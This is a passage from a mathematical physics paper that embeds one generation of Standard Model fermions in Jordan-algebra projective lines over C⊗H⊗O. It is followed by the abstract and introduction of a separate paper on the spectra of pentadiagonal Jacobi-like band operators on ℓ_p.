A single octonionic unit can always be implemented by multiplying by two units in four different ways. For instance, \(e_{1}=e_{1}1=e_{2}e_{3}=e_{4}e_{5}=e_{7}e_{6}\). If \(e_{1}f\) is uplifted to \(J_{e_{1}f}^{\rm off}\), by recalling the definition (90) of nested commutator of Jordan products, a generalized multiplication rule can be found to give \(J_{e_{1}f}^{\rm off}\) from \(J_{f}^{\rm off}\), \[J_{e_{1}f}^{\rm off} =m_{e_{1}}(J_{f}^{\rm off})\equiv\left\{J_{e_{1}},J_{1},J_{f}^{ \rm off}\right\}_{0}+\left\{J_{e_{3}},J_{e_{2}},J_{f}^{\rm off}\right\}_{0}+ \left\{J_{e_{5}},J_{e_{4}},J_{f}^{\rm off}\right\}_{0}+\left\{J_{e_{6}},J_{e_{ 7}},J_{f}^{\rm off}\right\}_{0}, \tag{110}\] \[J_{e_{2}f}^{\rm off} =m_{e_{2}}(J_{f}^{\rm off})\equiv\left\{J_{e_{2}},J_{1},J_{f}^{ \rm off}\right\}_{0}+\left\{J_{e_{1}},J_{e_{3}},J_{f}^{\rm off}\right\}_{0}+ \left\{J_{e_{6}},J_{e_{4}},J_{f}^{\rm off}\right\}_{0}+\left\{J_{e_{7}},J_{e_{ 5}},J_{f}^{\rm off}\right\}_{0},\] \[J_{e_{3}f}^{\rm off} =m_{e_{3}}(J_{f}^{\rm off})\equiv\left\{J_{e_{3}},J_{1},J_{f}^{ \rm off}\right\}_{0}+\left\{J_{e_{2}},J_{e_{1}},J_{f}^{\rm off}\right\}_{0}+ \left\{J_{e_{7}},J_{e_{4}},J_{f}^{\rm off}\right\}_{0}+\left\{J_{e_{5}},J_{e_{ 6}},J_{f}^{\rm off}\right\}_{0},\] \[J_{e_{4}f}^{\rm off} =m_{e_{4}}(J_{f}^{\rm off})\equiv\left\{J_{e_{4}},J_{1},J_{f}^{ \rm off}\right\}_{0}+\left\{J_{e_{1}},J_{e_{5}},J_{f}^{\rm off}\right\}_{0}+ \left\{J_{e_{2}},J_{e_{6}},J_{f}^{\rm off}\right\}_{0}+\left\{J_{e_{3}},J_{e_{ 7}},J_{f}^{\rm off}\right\}_{0},\] \[J_{e_{5}f}^{\rm off} =m_{e_{5}}(J_{f}^{\rm off})\equiv\left\{J_{e_{5}},J_{1},J_{f}^{ \rm off}\right\}_{0}+\left\{J_{e_{4}},J_{e_{1}},J_{f}^{\rm off}\right\}_{0}+ \left\{J_{e_{2}},J_{e_{7}},J_{f}^{\rm off}\right\}_{0}+\left\{J_{e_{3}},J_{e_{ 6}},J_{f}^{\rm off}\right\}_{0},\] \[J_{e_{6}f}^{\rm off} =m_{e_{6}}(J_{f}^{\rm off})\equiv\left\{J_{e_{6}},J_{1},J_{f}^{ \rm off}\right\}_{0}+\left\{J_{e_{4}},J_{e_{2}},J_{f}^{\rm off}\right\}_{0}+ \left\{J_{e_{7}},J_{e_{1}},J_{f}^{\rm off}\right\}_{0}+\left\{J_{e_{3}},J_{e_ {5}},J_{f}^{\rm off}\right\}_{0},\] \[J_{e_{7}f}^{\rm off} =m_{e_{7}}(J_{f}^{\rm off})\equiv\left\{J_{e_{7}},J_{1},J_{f}^{ \rm off}\right\}_{0}+\left\{J_{e_{4}},J_{e_{3}},J_{f}^{\rm off}\right\}_{0}+ \left\{J_{e_{1}},J_{e_{6}},J_{f}^{\rm off}\right\}_{0}+\left\{J_{e_{5}},J_{e_{ 2}},J_{f}^{\rm off}\right\}_{0}.\] Above, \(J_{1}\) represents the uplift of \(1\) to the real traceless symmetric \(2\times 2\) matrix, not an arbitrary element. Even though we are implementing octonionic multiplication, the above relations hold for \(f\in\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\). This allows for a representation of the Gell-Mann matrices in terms of elements of \(\mathbb{C}\otimes\mathbb{H}\otimes\overleftrightarrow{J_{2}(\mathbb{O})}\), \[m_{\Lambda_{1}} =-\frac{I}{2}(m_{e_{6}}m_{e_{1}}-m_{e_{2}}m_{e_{5}}), m_{\Lambda_{2}} =-\frac{I}{2}(m_{e_{2}}m_{e_{1}}+m_{e_{6}}m_{e_{5}}), \tag{111}\] \[m_{\Lambda_{3}} =-\frac{I}{2}(m_{e_{2}}m_{e_{6}}-m_{e_{1}}m_{e_{5}}), m_{\Lambda_{4}} =\frac{I}{2}(m_{e_{3}}m_{e_{5}}-m_{e_{1}}m_{e_{7}}),\] \[m_{\Lambda_{5}} =-\frac{I}{2}(m_{e_{3}}m_{e_{1}}-m_{e_{5}}m_{e_{7}}), m_{\Lambda_{6}} =\frac{I}{2}(m_{e_{2}}m_{e_{7}}+m_{e_{3}}m_{e_{6}}),\] \[m_{\Lambda_{7}} =\frac{I}{2}(m_{e_{2}}m_{e_{3}}+m_{e_{6}}m_{e_{7}}), m_{\Lambda_{8}} =\frac{I}{2\sqrt{3}}(m_{e_{2}}m_{e_{6}}+m_{e_{1}}m_{e_{5}}-2m_{e_{3}}m_{e_{7}}),\] where \(m_{\Lambda_{1}}(J_{f}^{\rm off})=-\frac{I}{2}(m_{e_{6}}(m_{e_{1}}(J_{f}^{\rm off }))-m_{e_{2}}(m_{e_{5}}(J_{f}^{\rm off})))\) more precisely. 
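The counting at the start of this passage (each imaginary unit is a product of two other imaginary units in exactly three ways, one per Fano line through it, in addition to the trivial \(e_{k}=e_{k}1\)) can be read off from any octonion multiplication table. The sketch below (ours) uses a Cayley–Dickson convention, so the particular pairs it prints need not match those appearing in Eq. (110), but the count of three non-trivial factorizations per unit is convention-independent.

```python
import numpy as np

def qmul(a, b):
    w1, x1, y1, z1 = a; w2, x2, y2, z2 = b
    return np.array([w1*w2 - x1*x2 - y1*y2 - z1*z2,
                     w1*x2 + x1*w2 + y1*z2 - z1*y2,
                     w1*y2 - x1*z2 + y1*w2 + z1*x2,
                     w1*z2 + x1*y2 - y1*x2 + z1*w2])

def qconj(a):
    return np.array([a[0], -a[1], -a[2], -a[3]])

def omul(x, y):
    """Octonion product via Cayley-Dickson doubling (one particular Fano orientation)."""
    a, b = x[:4], x[4:]; c, d = y[:4], y[4:]
    return np.concatenate([qmul(a, c) - qmul(qconj(d), b),
                           qmul(d, a) + qmul(b, qconj(c))])

E = np.eye(8)                              # E[n] is the unit octonion e_n (e_0 = 1)
for k in range(1, 8):
    ways = [(i, j) for i in range(1, 8) for j in range(1, 8)
            if np.allclose(omul(E[i], E[j]), E[k])]
    print(f"e{k} = e{k}*1 = " + " = ".join(f"e{i}e{j}" for i, j in ways))
```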
From here, particle states associated with elements of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) can be uplifted to \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\). It was confirmed that the \(SU(3)\) generators above annihilate leptons and apply color rotations to the quarks in the appropriate manner. The same relations found in \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) for \(SU(2)\times U(1)\) generators are also found by the appropriate uplift to \(\mathbb{C}\otimes\mathbb{H}\otimes\overleftrightarrow{J_{2}(\mathbb{O})}\). The appropriate left action of \(g\in\mathbb{C}\otimes\mathbb{H}\) on \(f\) uplifted to \(J_{f}^{\rm off}\) can be found simply by taking \(gJ_{f}^{\rm off}\), since the diagonal elements of \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\) can contain \(\mathbb{C}\otimes\mathbb{H}\). Uplifting the generators of \(SU(2)\times U(1)\) therefore gives \[m_{\tau_{9}} =\frac{i}{4}\left(I+m_{e_{4}}\right),\qquad m_{\tau_{10}}=\frac{j} {4}\left(I+m_{e_{4}}\right),\qquad m_{\tau_{11}}=\frac{k}{4}\left(I+m_{e_{4}} \right), \tag{112}\] \[m_{Y} =-\frac{1}{2}\left(\frac{I}{3}\left(m_{e_{1}}m_{e_{5}}+m_{e_{2}}m _{e_{6}}+m_{e_{3}}m_{e_{7}}\right)-\frac{k}{2}\left(I-m_{e_{4}}\right)\right),\] where all multiplication is assumed to act from the left. Similarly, the electric charge operator becomes \[m_{Q}=m_{\tau_{11}}+m_{Y}=-\frac{I}{2}\left(\frac{1}{3}\left(m_{e_{1}}m_{e_{5}} +m_{e_{2}}m_{e_{6}}+m_{e_{3}}m_{e_{7}}\right)-k\right). \tag{113}\] The fermionic states in the \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\) are identified as \[(\mathbf{1},\mathbf{2})_{-1/2}:J_{\psi_{l}} =\left(\mathcal{V}_{L}^{\downarrow}\epsilon_{\uparrow\uparrow}+ \mathcal{V}_{L}^{\downarrow}\epsilon_{\uparrow\downarrow}+\mathcal{E}_{L}^{ \downarrow}\epsilon_{\downarrow\uparrow}+\mathcal{E}_{L}^{\downarrow}\epsilon_{ \downarrow\downarrow}\right)J_{l}, \tag{114}\] \[(\mathbf{3},\mathbf{2})_{1/6}:J_{\psi_{q}} =-I\left(\mathcal{U}_{L}^{\sigma\uparrow}\epsilon_{\uparrow \uparrow}+\mathcal{U}_{L}^{\alpha\downarrow}\epsilon_{\uparrow\downarrow}+ \mathcal{D}_{L}^{\sigma\uparrow}\epsilon_{\downarrow\uparrow}+\mathcal{D}_{L} ^{\alpha\downarrow}\epsilon_{\downarrow\downarrow}\right)J_{q_{a}},\] \[(\mathbf{1},\mathbf{1})_{0}:J_{\psi_{e}^{\prime}} =\left(-\mathcal{V}_{R}^{\downarrow*}\epsilon_{\uparrow\uparrow }+\mathcal{V}_{R}^{\uparrow*}\epsilon_{\downarrow\downarrow}\right)J_{l^{*}},\] \[(\mathbf{1},\mathbf{1})_{1}:J_{\psi_{e}^{\prime}} =\left(\mathcal{E}_{R}^{\downarrow*}\epsilon_{\uparrow\uparrow }-\mathcal{E}_{R}^{\uparrow*}\epsilon_{\uparrow\downarrow}\right)J_{l^{*}}\] \[(\mathbf{\overline{3}},\mathbf{1})_{-2/3}:J_{\psi_{q}^{\prime}} =I\left(-\mathcal{U}_{R}^{\alpha\downarrow*}\epsilon_{\downarrow \uparrow}+\mathcal{U}_{R}^{\alpha\uparrow*}\epsilon_{\downarrow\downarrow} \right)J_{q_{a}^{\prime}},\] \[(\mathbf{\overline{3}},\mathbf{1})_{1/3}:J_{\psi_{q}^{\prime}} =I\left(\mathcal{D}_{R}^{\alpha\downarrow*}\epsilon_{\uparrow \uparrow}-\mathcal{D}_{R}^{\alpha\uparrow*}\epsilon_{\uparrow\downarrow}\right)J _{q_{a}^{\prime}},\] where in our conventions, the \(\mathbb{C}\otimes\mathbb{O}\) quantities such as \(l\) and \(q_{a}\) are uplifted explicitly to give \[J_{l} =\frac{1}{2}\left(\begin{array}{cc}0&1-e_{4}I\\ 1+e_{4}I&0\end{array}\right),\qquad J_{l^{*}}=\frac{1}{2}\left(\begin{array}[] {cc}0&1+e_{4}I\\ 1-e_{4}I&0\end{array}\right), \tag{115}\] \[J_{q_{1}} =\frac{1}{2}\left(\begin{array}{cc}0&-e_{5}+e_{1}I\\ e_{5}-e_{1}I&0\end{array}\right),\qquad 
J_{q_{1}^{*}}=\frac{1}{2}\left(\begin{array} []{cc}0&-e_{5}-e_{1}I\\ e_{5}+e_{1}I&0\end{array}\right),\] \[J_{q_{2}} =\frac{1}{2}\left(\begin{array}{cc}0&-e_{6}+e_{2}I\\ e_{6}-e_{2}I&0\end{array}\right),\qquad J_{q_{2}^{*}}=\frac{1}{2}\left(\begin{array} []{cc}0&-e_{6}-e_{2}I\\ e_{6}+e_{2}I&0\end{array}\right),\] \[J_{q_{3}} =\frac{1}{2}\left(\begin{array}{cc}0&-e_{7}+e_{3}I\\ e_{7}-e_{3}I&0\end{array}\right),\qquad J_{q_{3}^{*}}=\frac{1}{2}\left( \begin{array}{cc}0&-e_{7}-e_{3}I\\ e_{7}+e_{3}I&0\end{array}\right).\] It was confirmed that \(m_{\tau_{11}}\), \(m_{Y}\), and \(m_{Q}\) give the appropriate eigenvalues for these states. ### Uplift to \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\) Next, we seek to obtain the physics of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) by uplifting to \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\). The Hermitian conjugate of \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\) takes conjugation with respect to both \(\mathbb{C}\) and \(\mathbb{H}\). Uplifting an element \(f\in\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) to \(J_{f}^{\rm off}\in\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\) is given by \[J_{f}^{\rm off}=\left(\begin{array}{cc}0&f\\ \hat{f}^{*}&0\end{array}\right), \tag{116}\] where \(f^{*}\) is the complex conjugate and \(\hat{f}\) is the quaternionic conjugate. Finding the corresponding left action of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) within \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\) is straightforward for \(\mathbb{O}\), yet requires care with \(\mathbb{C}\otimes\mathbb{H}\). Left multiplication of \(I\) on \(f\) uplifted to \(J_{1f}^{\rm off}\) must be implemented with the nested Jordan commutator product (90), \[J_{1f}^{\rm off}=m_{I}(J_{f}^{\rm off})\equiv\{J_{I},J_{1},J_{f}^{\rm off}\}_{ \circ}. \tag{117}\] This holds for arbitrary elements \(f\in\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\). The analogous relationship for imaginary quaternionic units are \[J^{\rm off}_{if}=m_{i}(J^{\rm off}_{f}) \equiv\{J_{i},J_{1},J^{\rm off}_{\mathbb{O}}\}_{\circ}+\{J_{k},J_{j},J^{\rm off}_{\mathbb{O}}\}_{\circ},\] \[J^{\rm off}_{jf}=m_{j}(J^{\rm off}_{f}) \equiv\{J_{j},J_{1},J^{\rm off}_{\mathbb{O}}\}_{\circ}+\{J_{i},J_ {k},J^{\rm off}_{\mathbb{O}}\}_{\circ}, \tag{118}\] \[J^{\rm off}_{kf}=m_{k}(J^{\rm off}_{f}) \equiv\{J_{k},J_{1},J^{\rm off}_{\mathbb{O}}\}_{\circ}+\{J_{j},J_ {i},J^{\rm off}_{f}\}_{\circ}.\] The corresponding uplift of left multiplication by imaginary octonions is given by left multiplication, such that \(J^{\rm off}_{e_{i}f}=e_{i}J^{\rm off}_{f}\). From here, the uplift of the fermionic states and the action of bosonic operators on the fermions is similar to the previous discussion on \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\). To highlight this uplift with more detail and for a specific example, consider \(\psi^{c}_{e}\) as a left-chiral positron and weak isospin singlet, \[\psi^{c}_{\nu}=\left(\mathcal{E}^{\downarrow*}_{R}\epsilon_{\uparrow\uparrow}- \mathcal{E}^{\uparrow*}_{R}\epsilon_{\uparrow\downarrow}\right)l^{*}=\frac{1} {4}\left(\mathcal{E}^{\downarrow*}_{R}\left(1+Ik+e_{4}I-e_{4}k\right)+ \mathcal{E}^{\uparrow*}_{R}\left(-j+Ii-e_{4}i-e_{4}Ij\right)\right). 
\tag{119}\] Uplifting to \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\) explicitly gives \[J_{\psi^{c}_{\nu}} =\left(\begin{array}{cc}0&\left(\mathcal{E}^{\downarrow*}_{R} \epsilon_{\uparrow\uparrow}-\mathcal{E}^{\uparrow*}_{R}\epsilon_{\uparrow \downarrow}\right)l^{*}\\ \left(\mathcal{E}^{\downarrow}_{R}\epsilon_{\uparrow\uparrow}-\mathcal{E}^{ \uparrow}_{R}\epsilon_{\downarrow\uparrow}\right)l&0\end{array}\right) \tag{120}\] \[=\frac{1}{4}\left(\begin{array}{cc}0&\mathcal{E}^{\downarrow*}_{ R}\left(1+Ik+e_{4}I-e_{4}k\right)+\mathcal{E}^{\uparrow*}_{R}\left(-j+Ii-e_{4}i-e_{4} Ij\right)\\ \mathcal{E}^{\downarrow}_{R}\left(1+Ik-e_{4}I+e_{4}k\right)+\mathcal{E}^{ \uparrow}_{R}\left(j+Ii+e_{4}i-e_{4}Ij\right)&0\end{array}\right).\] The action of the Gell-Mann generators uplifted to \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\) is \[m_{\Lambda_{1}} =-\frac{m_{I}}{2}(e_{61}-e_{25}), m_{\Lambda_{2}} =-\frac{m_{I}}{2}(e_{21}+e_{65}),\] \[m_{\Lambda_{3}} =-\frac{m_{I}}{2}(e_{26}-e_{15}), m_{\Lambda_{4}} =\frac{m_{I}}{2}(e_{35}-e_{17}), \tag{121}\] \[m_{\Lambda_{5}} =-\frac{m_{I}}{2}(e_{31}-e_{57}), m_{\Lambda_{6}} =\frac{m_{I}}{2}(e_{27}+e_{36}),\] \[m_{\Lambda_{7}} =\frac{m_{I}}{2}(e_{23}+e_{67}), m_{\Lambda_{8}} =\frac{m_{I}}{2\sqrt{3}}(e_{26}+e_{15}-e_{37}).\] The electroweak generators are given by \[m_{\tau_{9}} =\frac{m_{I}}{2}m_{s}m_{i},\qquad m_{\tau_{10}}=\frac{m_{I}}{2}m _{s}m_{j},\qquad m_{\tau_{11}}=\frac{m_{I}}{2}m_{s}m_{k},\] \[m_{Y} =-\frac{m_{I}}{2}\left(\frac{1}{3}\left(e_{15}+e_{26}+e_{37} \right)-m_{s^{*}}m_{k}\right), \tag{122}\] where \[m_{s}(J_{f})=\frac{1}{2}\left(1-e_{4}m_{I}\right)J_{f},\qquad m_{s^{*}}(J_{f}) =\frac{1}{2}\left(1+e_{4}m_{I}\right)J_{f}. \tag{123}\] The electric charge operator is given by \[m_{Q}=m_{\tau_{11}}+m_{Y}=-\frac{m_{I}}{2}\left(\frac{1}{3}\left(e_{15}+e_{26} +e_{37}\right)-m_{k}\right). \tag{124}\] The action of these generators leads to the expected results when acting on \(J_{\psi^{c}_{\nu}}\). For instance, all of the \(SU(3)\) generators vanish and \(J_{\psi^{c}_{\nu}}\) is an eigenstate of \(m_{\tau_{11}}\) and \(m_{Y}\), \[m_{\Lambda_{i}}(J_{\psi^{c}_{\nu}}) =0,\] \[m_{\tau_{11}}(J_{\psi^{c}_{\nu}}) =0,\] \[m_{Y}(J_{\psi^{c}_{\nu}}) =1J_{\psi^{c}_{\nu}}, \tag{125}\] \[m_{Q}(J_{\psi^{c}_{\nu}}) =1J_{\psi^{c}_{\nu}},\] where \(1\) is found as an eigenvalue for electric charge and weak hypercharge with the left-chiral positron. ### Uplift to \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\) Finally, the physics of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) is uplifted to \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\). Uplifting an element \(f\in\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) to \(J_{f}^{\mathrm{eff}}\in\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\) is given by \[J_{f}^{\mathrm{eff}}=\left(\begin{array}{cc}0&f\\ \hat{f}&0\end{array}\right), \tag{126}\] where, as above, \(\hat{f}\) denotes the quaternionic conjugation of \(f\). From here, it is clear that the uplift of left multiplication by imaginary quaternionic units is identical to Eq. (118). Less care is needed with the complex numbers and octonions, as they are on the diagonals of \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\). The action of the Gell-Mann generators uplifted to \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\) is identical to Eq. (103). 
The electroweak generators are given by \[m_{\tau_{9}} =\frac{I}{2}\mathit{sm}_{i},\qquad m_{\tau_{10}}=\frac{I}{2} \mathit{sm}_{j},\qquad m_{\tau_{11}}=\frac{I}{2}\mathit{sm}_{k},\] \[m_{Y} =-\frac{I}{2}\left(\frac{1}{3}\left(e_{15}+e_{26}+e_{37}\right)- s^{*}m_{k}\right). \tag{127}\] The electric charge operator is given by \[m_{Q}=m_{\tau_{11}}+m_{Y}=-\frac{I}{2}\left(\frac{1}{3}\left(e_{15}+e_{26}+e_{ 37}\right)-m_{k}\right). \tag{128}\] The fermions of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) can be uplifted to \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\) via Eq. (126) and the generators shown above can be found to act appropriately on the fermionic states. ## VII Conclusions In this work, we showed how to construct three homogeneous spaces that, following Rosenfeld's interpretation of the Magic Square, correspond to his "generalized" projective lines over \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\). Such spaces are obtained from three non-simple Lie algebras obtained from Tits' construction for the Freudenthal Magic Square. The quotient space of these isometry groups modded out by derivations lead to \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}\left(\mathbb{O}\right)\), \(\mathbb{O}\otimes J_{2}\left(\mathbb{C}\otimes\mathbb{H}\right)\), and \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}\left(\mathbb{H}\right)\), which contains the three newly found Dixon-Rosenfeld projective lines. The physics of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) can be uplifted to each of these extended Jordan algebras and the generators of \(SU(3)\times SU(2)\times U(1)\) for the Standard Model can be uplifted into a (nested) chain algebra over \(\overleftarrow{\mathbb{C}\otimes\mathbb{H}\otimes J_{2}\left(\mathbb{O}\right)}\), \(\overleftarrow{\mathbb{O}\otimes J_{2}\left(\mathbb{C}\otimes\mathbb{H}\right)}\), and \(\overleftarrow{\mathbb{C}\otimes\mathbb{O}\otimes J_{2}\left(\mathbb{H}\right)}\). We provided explicit states for one generation of fermions in the standard model within these projective lines, including operators for gauge boson interactions and identification of charges. While non-simple Lie algebras were found from the Dixon-Rosenfeld projective lines and one generation of the Standard Model fermions were embedded into these projective lines, further work is needed to see if the appropriate representations of the Standard Model are contained within the corresponding isometry groups. For instance, while the bosonic interactions with fermions were demonstrated to be in the chain algebras over division algebras tensored with Jordan algebras and various \(SU(3)\times SU(2)\times U(1)\) groups can be found in the derivation groups, the representations with respect to these groups do not isolate the Standard Model fermionic representations and charges. This is similar to how \(Spin(9)\), \(SU(3)\times SU(3)\), and \(F_{4}\) are not GUT groups, but the octonions and \(F_{4}\) have been used to encode Standard Model fermions [18, 19, 17]. Additional work is needed to see if other subalgebras of these non-simple Lie algebras exist that can isolate the appropriate representation theory for the Standard Model. Otherwise, chain algebras such as \(\overleftarrow{\mathbb{A}\otimes J_{2}(\mathbb{B})}\) may lead to Clifford algebras that would be large enough to contain the Standard Model gauge group, just as \(\mathbb{C}\otimes\mathbb{H}\otimes\overleftarrow{\mathbb{O}}\) can lead to \(Cl(10)\). 
In future work, we seek to investigate the notion of Dixon-Rosenfeld projective planes to see if this may provide applications for three generations of the Standard Model fermions with \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\). Interactions with the Higgs boson would also be worth exploring, which has been discussed recently [17]. ## VIII Acknowledgments Thanks to Cohl Furey for countless helpful discussions related to \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) and Mia Hughes for additional support. Thanks to Richard Clawson, Dugan Hammock, and Garrett Lisi for discussions on Clifford algebras and minimal ideals. The work of D. Corradetti is supported by a grant of the Quantum Gravity Research Institute. The work of AM is supported by a "Maria Zambrano" distinguished researcher fellowship, financed by the European Union within the NextGenerationEU program.
2301.09302
Spectral Properties of Jacobi-like Band Matrices on the Sequence Space $\ell_p$
In this paper, the spectral properties of a class of Jacobi-like operators defined over the sequence space $\ell_{p}, (1<p<\infty)$ which has a representation of an infinite band matrix where the entries of each non-zero band form a sequence with two limit points are investigated. The idea of compact perturbation is used to study the spectrum. Several spectral subdivisions are obtained. In addition, a few sufficient conditions on the absence of point spectrum over the essential spectrum are also discussed.
Arnab Patra, Jyoti Rani
2023-01-23T07:21:47Z
http://arxiv.org/abs/2301.09302v1
# Spectral properties of Jacobi-like band matrices on the sequence space \(\ell_{p}\) ###### Abstract. In this paper, the spectral properties of a class of Jacobi-like operators defined over the sequence space \(\ell_{p},\)\((1<p<\infty)\) which has a representation of an infinite band matrix where the entries of each non-zero band form a sequence with two limit points are investigated. The idea of compact perturbation is used to study the spectrum. Several spectral subdivisions are obtained. In addition, a few sufficient conditions on the absence of point spectrum over the essential spectrum are also discussed. Key words and phrases:Spectrum, Sequence spaces, Band matrices, Jacobi operators 2020 Mathematics Subject Classification: Primary 47A10, 47B37; Secondary 47B36, 46B45 ## 1. **Introduction** The spectral analysis of operators defined over sequence spaces has been treated by many researchers worldwide. The literature contains the spectrum and fine spectrum of several classes of Toeplitz operators [2, 6, 9], Cesaro operators [1, 7, 14], Rhaly operators [21, 22], operators generated by various difference equations [10, 11, 17, 18, 19], etc. For a detailed review, one may refer to the survey articles [4, 20] and the references therein. In particular, numerous mathematicians have focused their research on an important class of tridiagonal matrix, known as Jacobi matrix [3, 15, 16, 7]. The Jacobi matrix \(J\) is generated by the difference equation \[(Jy)_{n}=a_{n-1}y_{n-1}+b_{n}y_{n}+a_{n}y_{n+1},\ y_{n}\in\mathbb{C}^{\mathbb{ N}}\] with certain initial conditions where \(\{a_{n}\}\) and \(\{b_{n}\}\) are complex sequences. In this paper, we focus on the spectral properties of a class of Jacobi-like penta-diagonal band matrices defined over the sequence space \(\ell_{p}(1<p<\infty)\) where the entries in the non-zero bands form sequences with two limit points. Let \(\ell_{p}\) represents the Banach space of \(p\)-absolutely summable sequences of real or complex numbers with the norm \[\left\|x\right\|_{p}=\left(\sum_{n=1}^{\infty}|x_{n}|^{p}\right)^{\frac{1}{p}}.\] Also let \(\mathcal{D}_{p}\) denotes the set of all diagonal operators on \(\ell_{p}.\) For any operator \(T\in\mathcal{D}_{p},\)\(\operatorname{diag}(T)\) represents the sequence in the diagonal of \(T.\) In this work we investigate the spectral properties of a class of operators \(T\) defined over \(\ell_{p}\) represented by the following form: \[T=S_{r}^{2}D_{1}+D_{2}S_{\ell}^{2}+D_{3}\] where \(S_{r},S_{\ell}:\ell_{p}\rightarrow\ell_{p},\) denotes the right shift operator, left shift operator respectively and \(D_{1},D_{2},D_{3}\in\mathcal{D}_{p}\) with \(\operatorname{diag}(D_{1})=\{c_{n}\},\)\(\operatorname{diag}(D_{2})=\{b_{n}\}\) and \(\operatorname{diag}(D_{3})=\{a_{n}\}\). We further assume that the subsequences \(\{a_{2n-1}\},\)\(\{b_{2n-1}\},\) \(\{c_{2n-1}\}\) converges to the real numbers \(r_{1},\)\(s_{1},\)\(s_{1}\) respectively and \(\{a_{2n}\},\)\(\{b_{2n}\},\)\(\{c_{2n}\}\) converges to the real numbers \(r_{2},\)\(s_{2},\)\(s_{2}\) respectively where \(s_{1}\neq 0\) and \(s_{2}\neq 0.\) Our focus is to investigate the spectral properties of the operator \(T\) using compact perturbation technique. 
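For readers who wish to experiment numerically, a finite section of \(T\) is easy to assemble. The following sketch is our own illustration (the sample values of \(r_{1},r_{2},s_{1},s_{2}\) and the \(1/n\) perturbations are hypothetical, chosen only so that the odd and even subsequences have the required two limit points); it builds the pentadiagonal truncation of \(T=S_{r}^{2}D_{1}+D_{2}S_{\ell}^{2}+D_{3}\).

```python
import numpy as np

# Illustrative limits (not taken from the paper): odd subsequences -> r1, s1, s1
# and even subsequences -> r2, s2, s2, as in the standing assumptions on T.
r1, r2, s1, s2 = 0.0, 5.0, 0.5, 1.0

def two_limit_sequence(limit_odd, limit_even, N):
    n = np.arange(1, N + 1)
    return np.where(n % 2 == 1, limit_odd, limit_even) + 1.0 / n   # 1/n perturbation

def truncation(a, b, c, N):
    """N x N section of T = S_r^2 D_1 + D_2 S_l^2 + D_3 (pentadiagonal, zero first off-diagonals)."""
    return np.diag(a[:N]) + np.diag(b[:N - 2], k=2) + np.diag(c[:N - 2], k=-2)

N = 8
a = two_limit_sequence(r1, r2, N)          # diag(D_3) = {a_n}
b = two_limit_sequence(s1, s2, N)          # diag(D_2) = {b_n}
c = two_limit_sequence(s1, s2, N)          # diag(D_1) = {c_n}
print(np.round(truncation(a, b, c, N), 3))
```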
Let us consider another operator \(T_{0}\) over \(\ell_{p}\) defined by \[T_{0}=S_{r}^{2}D_{1}^{\prime}+D_{2}^{\prime}S_{\ell}^{2}+D_{3}^{\prime}\] where \(D_{1}^{\prime},D_{2}^{\prime},D_{3}^{\prime}\in\mathcal{D}_{p}\) with \[\text{diag}(D_{1}^{\prime})=\text{diag}(D_{2}^{\prime})=\{s_{1},s_{2},s_{1},s _{2},\cdots\},\ \text{diag}(D_{3}^{\prime})=\{r_{1},r_{2},r_{1},r_{2},\cdots\}.\] Using the properties of compact operators, it can be proved that \(T-T_{0}\) is a compact operator over \(\ell_{p}\). Both the operators \(T\) and \(T_{0}\) can be represented by the following penta-diagonal matrices \[T=\begin{pmatrix}a_{1}&0&b_{1}&0&0&\cdots\\ 0&a_{2}&0&b_{2}&0&\cdots\\ c_{1}&0&a_{3}&0&b_{3}&\cdots\\ 0&c_{2}&0&a_{4}&0&\cdots\\ 0&0&c_{3}&0&a_{5}&\cdots\\ \vdots&\vdots&\vdots&\vdots&\vdots&\ddots\\ \end{pmatrix},T_{0}=\begin{pmatrix}r_{1}&0&s_{1}&0&0&\cdots\\ 0&r_{2}&0&s_{2}&0&\cdots\\ s_{1}&0&r_{1}&0&s_{1}&\cdots\\ 0&s_{2}&0&r_{2}&0&\cdots\\ 0&0&s_{1}&0&r_{1}&\cdots\\ \vdots&\vdots&\vdots&\vdots&\vdots&\ddots\\ \end{pmatrix}.\] We obtain the spectrum, fine spectrum and the sets of various spectral subdivisions of the operator \(T_{0}.\) It is interesting to note that the spectrum of \(T_{0}\) is given by \[[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}],\] which is also its essential spectrum with no eigenvalues. Later we investigate how the spectrum of \(T\) and \(T_{0}\) are related. Few results on the essential spectrum of \(T\) (which is identical to 